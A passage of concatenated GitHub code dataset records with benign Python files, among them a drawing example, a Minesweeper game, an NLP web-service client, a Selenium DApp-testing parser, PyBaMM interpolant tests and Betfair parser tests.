-1)\nd8 = (-d, -.5)\nd10 = (-d, .5)\nd12 = (0, 1)\n\np.op().stroked(colour.grey()).line ((-d/2, .25), (d/2, .75))\np.op().stroked(colour.grey()).line ((d/2, .25), (-d/2, .75))\n\nmj = d / maths.sqrt(2)\nmn = mj / maths.sqrt(3)\n\np.op().dashed().stroked(\"red\").ellipse((d/2, -.25), mj, mn, pypyx_maths.degrees(60))\np.op().dashed().stroked(\"green\").ellipse((0, .5), mj, mn, pypyx_maths.degrees(0))\np.op().dashed().stroked(\"blue\").ellipse((-d/2, -.25), mj, mn, pypyx_maths.degrees(-60))\n\np.op().stroked(\"red\").ellipse((d/2, -.25), mj/2, mn/2, pypyx_maths.degrees(60))\np.op().stroked(\"green\").ellipse((0, .5), mj/2, mn/2, pypyx_maths.degrees(0))\np.op().stroked(\"blue\").ellipse((-d/2, -.25), mj/2, mn/2, pypyx_maths.degrees(-60))\n\np.op().line (o, d2)\np.op().line (o, d10)\np.op().line (o, d6)\n\np.op().line (d2, d12)\np.op().line (d2, d4)\np.op().line (d6, d4)\np.op().line (d6, d8)\np.op().line (d10, d12)\np.op().line (d10, d8)\n\np.output_pdf (os.path.splitext(__file__)[0])\n","repo_name":"Rhubbarb/PyPyX","sub_path":"example/ellipse_cube.py","file_name":"ellipse_cube.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11063045767","text":"'''\nWrite a program that will compute the area of a circle.\nPrompt the user to enter the radius and\nprint a nice message back to the user with the answer.\n'''\n\n\nimport math\nr=float(input(\"please enter the radius:\"))\nareaCircle = math.pi*r**2\nprint(areaCircle)\n\n\n","repo_name":"wang0759/pythonLab3","sub_path":"areaCircle.py","file_name":"areaCircle.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74355821894","text":"import json\nimport os\nimport time\nfrom urllib.request import urlopen, Request\n\nurl = \"https://ws.clarin-pl.eu/nlprest2/base\"\n\n\ndef upload(text):\n file_id = urlopen(Request(url + '/upload/',\n text.encode('utf-8'),\n {'Content-Type': 'binary/octet-stream'})).read().decode()\n return file_id\n\n\ndef start_task(doc):\n json_doc = json.dumps(doc).encode('utf-8')\n\n task_id = urlopen(Request(url + '/startTask/',\n json_doc,\n {'Content-Type': 'application/json'})).read().decode()\n\n time.sleep(0.2)\n\n resp = urlopen(Request(url + '/getStatus/' + task_id))\n\n data = json.load(resp)\n\n while data[\"status\"] == \"QUEUE\" or data[\"status\"] == \"PROCESSING\":\n time.sleep(0.5)\n resp = urlopen(Request(url + '/getStatus/' + task_id))\n data = json.load(resp)\n\n if data[\"status\"] == \"ERROR\":\n print(\"Error \" + data[\"value\"])\n return None, data['value']\n\n return data[\"value\"], None\n\n\nasync def process(document_id, text, model, out='downloads/'):\n \"\"\"\n Processes text by using clarin services\n :param out: path to output directory\n :param model: liner2 model name\n :param document_id: uuid\n :param text: string\n :return: result file path\n \"\"\"\n\n file_id = upload(text)\n data = {\n 'lpmn': 'any2txt|wcrft2({\"morfeusz2\":false})|liner2({\"model\":\"'+model+'\"})',\n 'user': 'geocoder',\n 'file': file_id\n }\n\n response, errors = start_task(data)\n\n if errors is not None:\n return {'errors': errors}\n\n if response is not None:\n response = response[0][\"fileID\"]\n content = urlopen(Request(url + '/download' + response)).read().decode()\n with open(out + os.path.basename(document_id) + '.' + model, \"w\") as outfile:\n outfile.write(content)\n\n return {'model': model,\n 'path': out + os.path.basename(document_id) + '.' + model,\n 'errors': None}\n","repo_name":"CLARIN-PL/text-geocoder","sub_path":"text_geocoder/api/v1/ws_clarin.py","file_name":"ws_clarin.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6263663257","text":"import os\nimport unittest\n\nfrom genofunc.extract_metadata import *\n\nthis_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndata_dir = os.path.join(this_dir, 'tests', 'data')\n\nclass TestExtractMetadata(unittest.TestCase):\n def test_run_extract_metadata(self):\n in_fasta = \"%s/sequences/seqB.fasta\" %data_dir\n in_metadata = \"%s/metadata/metadataB.tsv\" %data_dir\n column = [\"country\"]\n index_field = \"strain\"\n out_fasta = \"%s/output/tmp.extract.fasta\" %data_dir\n out_metadata = \"%s/output/tmp.extracted_metadata.csv\" %data_dir\n log_file = \"%s/output/extract_metadata.log\" %data_dir\n extract_metadata(in_fasta, in_metadata, column, index_field, out_fasta, out_metadata, log_file)\n os.unlink(out_fasta)\n os.unlink(out_metadata)\n os.unlink(log_file)\n","repo_name":"xiaoyu518/genofunc","sub_path":"tests/extract_metadata_test.py","file_name":"extract_metadata_test.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"1142024488","text":"from tkinter import Button, Label\nimport random\nimport sys\nimport config\n\n\nclass Cell:\n all = []\n cell_count = config.cell_count\n mine_count = config.mine_count\n mine_count_label = None\n\n def __init__(self, x, y, is_mine = False):\n self.x = x \n self.y = y\n self.is_mine = is_mine\n self.button = None\n self.is_open = False\n self.can_be_mine = False\n\n Cell.all.append(self)\n\n def create_button(self, location):\n button = Button(location, \n bg = \"lightpink2\",\n width = 1, \n height = 1) \n \n button.bind(\"\", self.left_click)\n button.bind(\"\", self.right_click)\n\n self.button = button\n\n @staticmethod\n def create_mine_count_label(location):\n label = Label(\n location,\n bg = \"light blue\",\n fg = \"black\",\n text = f\"Flags: {Cell.mine_count}\",\n font = (\"12\") \n )\n Cell.mine_count_label = label\n\n def left_click(self, event):\n if self.is_mine:\n self.show_mine()\n else:\n if self.surrounding_mine_count == 0:\n for cell in self.surrounding_cells:\n cell.show_cell()\n self.show_cell()\n \n if Cell.cell_count == config.mine_count:\n sys.exit()\n\n self.button.unbind(\"\")\n self.button.unbind(\"\")\n\n def cell_axis(self, x, y):\n for cell in Cell.all:\n if cell.x == x and cell.y == y:\n return cell\n\n @property \n def surrounding_cells(self):\n cells = [self.cell_axis(self.x-1, self.y-1),\n self.cell_axis(self.x, self.y-1),\n self.cell_axis(self.x+1, self.y-1),\n self.cell_axis(self.x+1, self.y),\n self.cell_axis(self.x+1, self.y+1),\n self.cell_axis(self.x, self.y+1),\n self.cell_axis(self.x-1, self.y+1),\n self.cell_axis(self.x-1, self.y),\n ]\n cells = [cell for cell in cells if cell is not None]\n return cells\n\n @property \n def surrounding_mine_count(self):\n count = 0\n for cell in self.surrounding_cells:\n if cell.is_mine:\n count += 1\n return count\n \n def show_cell(self):\n if not self.is_open:\n Cell.cell_count -= 1\n self.button.configure(text = self.surrounding_mine_count)\n self.button.configure(bg = \"lightpink2\")\n self.is_open = True\n\n def show_mine(self):\n self.button.configure(bg = \"red\")\n\n def right_click(self, event):\n if not self.can_be_mine:\n self.button.configure(bg = \"deep pink\")\n self.can_be_mine = True\n Cell.mine_count -= 1\n if Cell.mine_count_label:\n Cell.mine_count_label.configure(text = f\"Flags: {Cell.mine_count}\")\n else:\n self.button.configure(bg = \"lightpink2\")\n self.can_be_mine = False\n\n @staticmethod\n def random_mines():\n chosen_cells = random.sample(Cell.all, config.mine_count)\n for cell in chosen_cells:\n cell.is_mine = True\n\n def __repr__(self):\n return f\"Cell{self.x}, {self.y}\"","repo_name":"smilinh21/mine_sweeper","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33926668393","text":"import time\n\nfrom selenium.common.exceptions import NoSuchElementException, JavascriptException\nfrom selenium.webdriver.common.by import By\n\nfrom py2neo import Graph, NodeMatcher, RelationshipMatcher, Node\n\nfrom util.configuration import config\nfrom util.utils import detect_path_trace\nfrom util.browser import Chrome\nfrom util.environment import env, EnvKey\n\n\nclass Parser:\n\n def __init__(self, chrome: Chrome):\n self.driver = chrome.driver\n self.chrome = chrome\n graph = Graph(config['neo4j']['host'],\n auth=(config['neo4j']['username'], config['neo4j']['password']),\n name=config['neo4j']['name'])\n self.node_matcher = NodeMatcher(graph)\n self.relationship_matcher = RelationshipMatcher(graph)\n self.display_element_xpath = config['debug']['display-element-xpath']\n\n # 执行抽象的检测过程\n def handle(self) -> bool:\n window_handles = self.driver.window_handles\n if len(window_handles) > 1:\n self.driver.switch_to.window(window_handles[0])\n # 获取开始节点\n start_node = self.node_matcher.match('Intention', name='start').first()\n return self.execute_abstract_step(start_node)\n\n def execute_abstract_step(self, prev_node: Node) -> bool:\n # 遍历每一条关系\n r_type = 'next'\n current_detect_status = False\n current_detect_node = None\n next_intention_nodes = sorted([next_rel.end_node for next_rel in\n self.relationship_matcher.match((prev_node, None), r_type=r_type).all()],\n key=lambda x: x.get('bias') or 100, reverse=True)\n for cur_node in next_intention_nodes:\n # 判断是否满足当前关系成立的条件\n execute_real_step_result = self.execute_real_step(cur_node)\n if execute_real_step_result:\n intention_path = env.get(EnvKey.INTENTION_PATH, [])\n intention_path.append(cur_node.get('name'))\n env.set(EnvKey.INTENTION_PATH, intention_path)\n current_detect_node = cur_node\n current_detect_status = True\n break\n # 如果检测失败,则直接退出\n if not current_detect_status or current_detect_node is None:\n return False\n if current_detect_node.get('name') == 'end':\n return True\n # 如果检测成功,当前节点不为end则继续执行\n return self.execute_abstract_step(current_detect_node)\n\n # 执行具体的检测步骤\n @detect_path_trace\n def execute_real_step(self, detect_node: Node) -> bool:\n # 获取开始节点\n impl_r_type = 'impl'\n impl_relationship = self.relationship_matcher.match((detect_node, None), r_type=impl_r_type).first()\n # 如果开始节点为空,则直接返回True\n if impl_relationship is None or impl_relationship.end_node is None:\n return True\n start_node = impl_relationship.end_node\n return self.execute_basic_step(start_node)\n\n # 执行Action\n def execute_basic_step(self, prev_node: Node) -> bool:\n # 遍历每一条关系\n current_operate_status = False\n current_operate_node = None\n next_r_type = 'next'\n next_nodes = sorted([next_rel.end_node for next_rel in\n self.relationship_matcher.match((prev_node, None), r_type=next_r_type).all()],\n key=lambda x: x.get('bias') or 100, reverse=True)\n self.wait_elements(next_nodes)\n for cur_node in next_nodes:\n # 判断是否满足当前关系成立的条件\n execute_operation_status = self.execute_operation(cur_node)\n if execute_operation_status:\n current_operate_node = cur_node\n current_operate_status = True\n break\n # 如果执行失败,则直接退出\n if not current_operate_status or current_operate_node is None:\n return False\n # 如果检测成功,且当前节点为end\n if current_operate_node.get('name') == 'end':\n return True\n # 如果检测成功,当前节点不为end则继续执行\n return self.execute_basic_step(current_operate_node)\n\n # 循环检查页面是否准备就绪\n def wait_elements(self, next_nodes):\n # 如果当前是start、end,直接返回\n if len(next_nodes) == 1 and next_nodes[0].get('operation') in ['start', 'end']:\n return True\n count = 0\n\n origin_window_handle = self.driver.current_window_handle\n max_wait_time = config['dapp']['wait-time']\n for next_node in next_nodes:\n max_wait_time = max(next_node.get('wait-time', max_wait_time), max_wait_time)\n\n while count < max_wait_time:\n for next_node in next_nodes:\n operation = next_node.get('operation', 'start')\n keywords = next_node.get('keywords', [])\n sort = next_node.get('sort', 'asc')\n tags = next_node.get('tags', [])\n scope = next_node.get('scope', 'web')\n xpath = next_node.get('xpath', None)\n find_elements = False\n switch_another_window, step_info_frame = False, False\n if scope == 'wallet':\n # 如果没有切换到钱包,则直接进行下一个操作\n if not self.switch_to_wallet_window_handle():\n continue\n switch_another_window = True\n if operation in ['start', 'end']:\n continue\n if operation in ['exist']:\n keywords = self.get_exist_keywords(next_node.get('extra_data', 'account'))\n\n if xpath:\n try:\n self.driver.find_element(By.XPATH, xpath)\n find_elements = True\n except NoSuchElementException:\n continue\n elif keywords:\n executable_elements, step_info_frame = self.chrome.get_target_executable_elements_by_keywords(\n keywords=keywords,\n tags=tags,\n sort=sort)\n find_elements = len(executable_elements) > 0\n if step_info_frame or switch_another_window:\n self.chrome.driver.switch_to.window(origin_window_handle)\n\n if find_elements:\n return\n time.sleep(1)\n count += 1\n\n def get_exist_keywords(self, extra_data):\n keywords = []\n if extra_data == 'account':\n # 获取钱包账户地址,如果不存在直接返回False,如果存在则截取最后四位\n try:\n account = self.driver.execute_script('return window.ethereum.selectedAddress')\n if account is not None:\n keywords += [\n 'web3-status-connected',\n '...' + account[len(account) - 4:],\n account[:3] + '...' + account[len(account) - 4:],\n account[:5],\n ]\n except JavascriptException:\n pass\n return keywords\n\n def switch_to_wallet_window_handle(self):\n current_url = self.driver.current_url\n wallet_id = config['chrome']['metamask']['id']\n if wallet_id in current_url:\n return True\n all_window_handles = self.driver.window_handles\n if len(all_window_handles) == 1:\n return False\n self.chrome.driver.switch_to.window(all_window_handles[-1])\n return True\n\n # 解释执行器\n @detect_path_trace\n def execute_operation(self, node: Node) -> bool:\n # 检测node是否合法\n if 'Action' not in node.labels:\n return False\n\n # 如果是exist需要提前从data中取出关键字,然后作为关键字进行查找\n operation = node.get('operation', 'start')\n sort = node.get('sort', 'asc')\n scope = node.get('scope', 'web')\n xpath = node.get('xpath', None)\n tags = node.get('tags', None)\n keywords = node.get('keywords', None)\n key = node.get('key', None)\n\n if operation in ['start', 'end']:\n return True\n if operation in ['exist'] and (not keywords and not node.get('data', None)):\n return False\n if operation not in ['exist'] and (not keywords and not xpath):\n return False\n if operation in ['record'] and (not key):\n return False\n\n step_info_frame = False\n switch_another_window = False\n\n # 如果scope为钱包,判断是否需打开新的window\n origin_window_handle = self.driver.current_window_handle\n all_window_handles = self.driver.window_handles\n\n if scope == 'wallet':\n if len(all_window_handles) == 1:\n return False\n current_url = self.driver.current_url\n wallet_id = config['chrome']['metamask']['id']\n if wallet_id not in current_url:\n self.chrome.driver.switch_to.window(all_window_handles[-1])\n switch_another_window = True\n\n # 根据xpath或keywords查找相关元素\n result = False\n executable_elements = []\n\n if xpath:\n executable_elements, step_info_frame = self.chrome.get_target_executable_elements_by_xpath(xpath)\n elif keywords:\n executable_elements, step_info_frame = self.chrome.get_target_executable_elements_by_keywords(keywords,\n tags,\n sort)\n # 根据operation类型进行相关处理\n if operation == 'exist':\n key = node.get('extra_data', 'account')\n if key == 'account':\n account = self.driver.execute_script('return window.ethereum.selectedAddress')\n result = account is not None\n else:\n keywords = self.get_exist_keywords(node.get('extra_data', 'account'))\n result = keywords and self.execute_exist(keywords, node)\n elif operation == 'click':\n result = len(executable_elements) > 0 and self.execute_click(executable_elements, node)\n elif operation == 'input':\n result = len(executable_elements) > 0 and self.execute_input(executable_elements, node)\n elif operation == 'record':\n result = len(executable_elements) > 0 and self.execute_record(executable_elements, node)\n if step_info_frame or switch_another_window:\n self.chrome.driver.switch_to.window(origin_window_handle)\n return result\n\n # 执行点击操作\n def execute_click(self, element_info_list: [{}], node: Node) -> bool:\n # 执行之前记录页面html\n self.chrome.record_page_html()\n # 记录窗口数量\n self.chrome.record_window_handles()\n\n def find_suitable_element(cur_executable_element, cur_xpath):\n if cur_xpath.endswith('/button') or '/button/' not in cur_xpath:\n return cur_executable_element, cur_xpath\n suit_xpath = cur_xpath.split('/button/')[0] + '/button'\n suit_element = self.chrome.get_element(By.XPATH, suit_xpath)\n return suit_element, suit_xpath\n\n for element_info in element_info_list:\n # 向上寻找合适的元素\n element, xpath = find_suitable_element(element_info['web_element'], element_info['xpath'])\n self.display_element_xpath and print(xpath)\n if self.chrome.click_element(executable_element=element,\n xpath=xpath,\n check_change=True):\n return True\n return False\n\n # 执行输入操作\n def execute_input(self, element_info_list: [{}], node: Node) -> bool:\n # 执行之前记录页面html\n self.chrome.record_page_html()\n for element_info in element_info_list:\n self.display_element_xpath and print(element_info['xpath'])\n if self.chrome.input_element(executable_element=element_info['web_element'],\n xpath=element_info['xpath'],\n input_value=config['dapp']['input-amount'],\n check_change=True):\n return True\n return False\n\n # 执行记录操作\n def execute_record(self, element_info_list: [{}], node: Node) -> bool:\n key, result = node.get('key'), []\n for element_info in element_info_list:\n html_element, executable_element = element_info['html_element'], element_info['web_element']\n if html_element.tag in ['input']:\n wait_time = node.get('wait-time', config['dapp']['wait-time'])\n retry_count = 0\n value = None\n disabled = executable_element.get_attribute('disabled')\n if disabled:\n placeholder = executable_element.get_attribute('placeholder')\n if placeholder:\n value = placeholder\n while retry_count < wait_time and not value:\n value = executable_element.get_attribute('value')\n if not value or value in ['0', '0.0']:\n executable_element = self.driver.find_element(By.XPATH, element_info['xpath'])\n value = None\n time.sleep(1)\n retry_count += 1\n result.append(value)\n else:\n result += list(html_element.itertext())\n page_state = env.get(EnvKey.PAGE_STATE, {})\n stripped = []\n for r in result:\n if r.strip():\n stripped.append(r.strip())\n page_state[key] = stripped\n env.set(EnvKey.PAGE_STATE, page_state)\n return True\n\n # 执行判断存在操作\n def execute_exist(self, keywords: [str], node: Node) -> bool:\n html = self.chrome.html.lower()\n for keyword in keywords:\n if keyword.lower() in html:\n return True\n return False\n","repo_name":"HuskiesUESTC/DAppHunter","sub_path":"util/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":14605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19211736335","text":"class Conversion:\n\n def Decimal_To_Binary(self, Decimal, User_Answer=0):\n if User_Answer == 3:\n return int(Decimal, 2)\n\n else:\n Binary = bin(Decimal).replace(\"0b\", \"\")\n return Binary\n\n def test(self, Answer=''):\n User_Answer = input(\">>\")\n if f'{Answer}' == User_Answer:\n print(\"정답\\n\")\n else:\n self.test(Answer)\n","repo_name":"PJO2004/conversion_binary_test","sub_path":"API/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18189138216","text":"from src.sql.connect import connect_sql\nfrom src.datacls.user_f import User, ActiveUserList\nimport json\n\nclass MixUiAttri:\n \"\"\"\n 记录非初始化之外的属性和相关的维护\n \"\"\"\n\n def get_item_info(self, sid):\n\n connection,cursor = connect_sql()\n\n # SQL query\n query = \"SELECT * FROM item_info WHERE sid = %s\"\n cursor.execute(query, (sid,)) \n result = cursor.fetchone()\n\n # Close the cursor and the connection\n cursor.close()\n connection.close()\n \n if result:\n json_fields = ['tags', 'infobox', 'collection', \"count\", 'images'] # Add any other fields that are stored as JSON\n for field in json_fields:\n if result.get(field):\n result[field] = json.loads(result[field])\n\n return result\n\n\n def fetch_user_map(self):\n connection, cursor = connect_sql()\n\n # 查询所有记录\n cursor.execute('SELECT uid, uname FROM user_mapping')\n records = cursor.fetchall()\n\n cursor.close()\n connection.close()\n data = records\n\n # 构建两个字典\n self.uid_to_uname = {record[0]: record[1] for record in data}\n self.uname_to_uid = {record[1]: record[0] for record in data}\n\n def add_user(self, uid):\n u = User()\n u.uid = uid\n self.user_dict[uid] = u\n\n def get_user(self, uid):\n if uid not in self.user_dict.keys():\n self.add_user(uid)\n return self.user_dict[uid]\n","repo_name":"klove2020/bangrecs","sub_path":"src/datacls/mix/mix_ui_attri_f.py","file_name":"mix_ui_attri_f.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29430093985","text":"#\n# Tests for the Function classes\n#\nimport pybamm\n\nimport unittest\nimport numpy as np\n\n\nclass TestInterpolant(unittest.TestCase):\n def test_errors(self):\n with self.assertRaisesRegex(ValueError, \"data should have exactly two columns\"):\n pybamm.Interpolant(np.ones(10), None)\n with self.assertRaisesRegex(ValueError, \"interpolator 'bla' not recognised\"):\n pybamm.Interpolant(np.ones((10, 2)), None, interpolator=\"bla\")\n\n def test_interpolation(self):\n x = np.linspace(0, 1)[:, np.newaxis]\n y = pybamm.StateVector(slice(0, 2))\n # linear\n linear = np.hstack([x, 2 * x])\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp = pybamm.Interpolant(linear, y, interpolator=interpolator)\n np.testing.assert_array_almost_equal(\n interp.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([0.794, 3])\n )\n # square\n square = np.hstack([x, x ** 2])\n y = pybamm.StateVector(slice(0, 1))\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp = pybamm.Interpolant(square, y, interpolator=interpolator)\n np.testing.assert_array_almost_equal(\n interp.evaluate(y=np.array([0.397]))[:, 0], np.array([0.397 ** 2])\n )\n\n # with extrapolation set to False\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp = pybamm.Interpolant(\n square, y, interpolator=interpolator, extrapolate=False\n )\n np.testing.assert_array_equal(\n interp.evaluate(y=np.array([2]))[:, 0], np.array([np.nan])\n )\n\n def test_name(self):\n a = pybamm.Symbol(\"a\")\n x = np.linspace(0, 1)[:, np.newaxis]\n interp = pybamm.Interpolant(np.hstack([x, x]), a, \"name\")\n self.assertEqual(interp.name, \"interpolating function (name)\")\n\n def test_diff(self):\n x = np.linspace(0, 1)[:, np.newaxis]\n y = pybamm.StateVector(slice(0, 2))\n # linear (derivative should be 2)\n linear = np.hstack([x, 2 * x])\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp_diff = pybamm.Interpolant(linear, y, interpolator=interpolator).diff(\n y\n )\n np.testing.assert_array_almost_equal(\n interp_diff.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([2, 2])\n )\n # square (derivative should be 2*x)\n square = np.hstack([x, x ** 2])\n for interpolator in [\"pchip\", \"cubic spline\"]:\n interp_diff = pybamm.Interpolant(square, y, interpolator=interpolator).diff(\n y\n )\n np.testing.assert_array_almost_equal(\n interp_diff.evaluate(y=np.array([0.397, 0.806]))[:, 0],\n np.array([0.794, 1.612]),\n decimal=3,\n )\n\n def test_processing(self):\n x = np.linspace(0, 1)[:, np.newaxis]\n y = pybamm.StateVector(slice(0, 2))\n linear = np.hstack([x, 2 * x])\n interp = pybamm.Interpolant(linear, y)\n\n self.assertEqual(interp.id, interp.new_copy().id)\n self.assertEqual(interp.id, interp.simplify().id)\n\n\nif __name__ == \"__main__\":\n print(\"Add -v for more debug output\")\n import sys\n\n if \"-v\" in sys.argv:\n debug = True\n pybamm.settings.debug_mode = True\n unittest.main()\n","repo_name":"zlgenuine/pybamm","sub_path":"tests/unit/test_expression_tree/test_interpolant.py","file_name":"test_interpolant.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44020414493","text":"from flask import Flask, request, jsonify, send_file\n\napp = Flask(__name__)\n\n# Existing endpoint to receive a YouTube URL\n@app.route('/receive-youtube-url', methods=['POST'])\ndef receive_youtube_url():\n data = request.get_json()\n youtube_url = data.get('youtubeURL')\n \n # Process the YouTube URL as needed\n with open('youtube_url.text', 'w') as file:\n file.write(youtube_url)\n \n return jsonify({'message': 'YouTube URL received'})\n\n# New endpoint to receive a URL from Streamlit\n@app.route('/send-url', methods=['POST'])\ndef send_url():\n data = request.get_json()\n url = data.get('url')\n \n # Write the URL to a text file\n with open('url.txt', 'w') as file:\n file.write(url)\n \n # Return a response to the extension\n print(url)\n return jsonify({\"message\": \"URL received and saved to file\"})\n\n# New endpoint to serve the content of the url.txt file\n@app.route('/get-url-file', methods=['GET'])\ndef get_url_file():\n try:\n with open('url.txt', 'r') as file:\n url = file.read()\n return jsonify({\"url\": url}) # Return the URL within a JSON response\n except Exception as e:\n return jsonify({\"error\": str(e)}) # Handle errors and return them as JSON\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=5001)","repo_name":"mohandasnj/seeknspot","sub_path":"seeknspot_streamlit/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23379845515","text":"\"\"\"\nThis file tests the functionality of BetfairHistoricalFileParser\n\"\"\"\nimport bz2\nimport json\nimport os\n\nimport pytest\nfrom jsonschema.exceptions import ValidationError\n\nfrom betfairHistorical import BetfairHistoricalFileParser\nfrom betfairHistorical.exceptions import InvalidMarket, InvalidMarketChange\n\nTEST_DATA_LOCAL_DIR = os.path.join(os.getcwd(), 'sample_data')\nTEST_DATA_LOCAL_FILE = os.path.join(TEST_DATA_LOCAL_DIR, 'football-basic-sample.bz2')\n\nwith bz2.open(TEST_DATA_LOCAL_FILE) as f:\n\tCONTENTS = f.readlines()\n\nparser = BetfairHistoricalFileParser(\n\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\tsport=\"soccer\",\n\t\tplan=\"basic\",\n\t\tmarket=\"match_odds\",\n\t\trecursive=True,\n\t\tvalidate=False\n\t)\n\nevent = parser.data[0][0]\nmarket = json.loads(event.decode())\nmarket_change = market.get('mc')[8]\t# contains both marketDefinition and rc\n\n\nclass TestBetfairHistoricalFileParser:\n\n\t# Init tests\n\tdef test_local_path_not_exists(self):\n\t\twith pytest.raises(FileExistsError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=\"This is not a path\",\n\t\t\t\tsport=\"soccer\",\n\t\t\t\tplan=\"basic\",\n\t\t\t\tmarket=\"match_odds\"\n\t\t\t)\n\n\tdef test_sport_not_in_supported_markets(self):\n\t\twith pytest.raises(NotImplementedError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\t\tsport=\"animals\",\n\t\t\t\tplan=\"basic\",\n\t\t\t\tmarket=\"match_odds\",\n\t\t\t\tvalidate=True\n\t\t\t)\n\n\tdef test_plan_not_in_supported_plans(self):\n\t\twith pytest.raises(NotImplementedError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\t\tsport=\"soccer\",\n\t\t\t\tplan=\"imaginary\",\n\t\t\t\tmarket=\"match_odds\",\n\t\t\t\tvalidate=True\n\t\t\t)\n\n\tdef test_market_not_in_supported_markets(self):\n\t\twith pytest.raises(NotImplementedError):\n\t\t\tBetfairHistoricalFileParser(\n\t\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\t\tsport=\"soccer\",\n\t\t\t\tplan=\"basic\",\n\t\t\t\tmarket=\"piegate\",\n\t\t\t\tvalidate=True\n\t\t\t)\n\n\t# _read_files tests\n\tdef test_read_files_returns_expected_data(self):\n\t\tassert parser._read_file(TEST_DATA_LOCAL_FILE) == CONTENTS\n\n\tdef test_read_files_recursively_returns_data(self):\n\t\tassert parser.data == [CONTENTS]\n\n\t# _validate_schema tests\n\tdef test_validate_schema_with_default(self):\n\t\tdefault_schema_parser = BetfairHistoricalFileParser(\n\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\tsport=\"soccer\",\n\t\t\tplan=\"basic\",\n\t\t\tmarket=\"match_odds\",\n\t\t\trecursive=True,\n\t\t\tvalidate=False\n\t\t\t)\n\t\tassert not default_schema_parser._validate_schema(CONTENTS)\n\n\tdef test_validate_schema_with_supplied_schema(self):\n\t\tpassed_schema_parser = BetfairHistoricalFileParser(\n\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\tsport=\"soccer\",\n\t\t\tplan=\"basic\",\n\t\t\tmarket=\"match_odds\",\n\t\t\trecursive=True,\n\t\t\tvalidate=False,\n\t\t\tvalidation_schema={}\t# allows all valid dicts\n\t\t\t)\n\t\tassert not passed_schema_parser._validate_schema(CONTENTS)\n\n\tdef test_validate_schema_fails_on_invalid(self):\n\t\tinvalid_parser = BetfairHistoricalFileParser(\n\t\t\tlocal_path=TEST_DATA_LOCAL_DIR,\n\t\t\tsport=\"soccer\",\n\t\t\tplan=\"basic\",\n\t\t\tmarket=\"match_odds\",\n\t\t\trecursive=True,\n\t\t\tvalidate=False,\n\t\t\tvalidation_schema={\"type\": \"number\"}\n\t\t\t)\n\t\twith pytest.raises(ValidationError):\n\t\t\tinvalid_parser._validate_schema(CONTENTS)\t\t\t\n\n\t# get_market_change_id tests\n\tdef test_get_market_change_with_id(self):\n\t\tmc_id = parser.get_market_change_id(market_change)\n\t\tassert mc_id == \"1.131162722\"\n\n\tdef test_get_market_change_no_id(self):\n\t\twith pytest.raises(InvalidMarketChange):\n\t\t\tparser.get_market_change_id({})\n\n\t# get_market_definition tests\n\tdef test_get_market_definition_with_marketDefinition(self):\n\t\tmd = parser.get_market_definition(market_change)\n\t\texpected_md = {\n\t\t\t'betDelay': 0,\n\t\t\t'bettingType': 'ODDS',\n\t\t\t'bspMarket': False,\n\t\t\t'bspReconciled': False,\n\t\t\t'complete': True,\n\t\t\t'countryCode': 'GB',\n\t\t\t'crossMatching': True,\n\t\t\t'discountAllowed': True,\n\t\t\t'eventId': '28202626',\n\t\t\t'eventName': 'Middlesbrough v Man City',\n\t\t\t'eventTypeId': '1',\n\t\t\t'inPlay': False,\n\t\t\t'marketBaseRate': 5.0,\n\t\t\t'marketTime': '2017-04-30T13:05:00.000Z',\n\t\t\t'marketType': 'HALF_TIME_FULL_TIME',\n\t\t\t'name': 'Half Time/Full Time',\n\t\t\t'numberOfActiveRunners': 9,\n\t\t\t'numberOfWinners': 1,\n\t\t\t'openDate': '2017-04-30T13:05:00.000Z',\n\t\t\t'persistenceEnabled': True,\n\t\t\t'regulators': ['MR_INT'],\n\t\t\t'runners': [\n\t\t\t\t{\n\t\t\t\t\t'id': 71080,\n\t\t\t\t\t'name': 'Middlesbrough/Middlesbrough',\n\t\t\t\t\t'sortPriority': 1,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 71079,\n\t\t\t\t\t'name': 'Middlesbrough/Draw',\n\t\t\t\t\t'sortPriority': 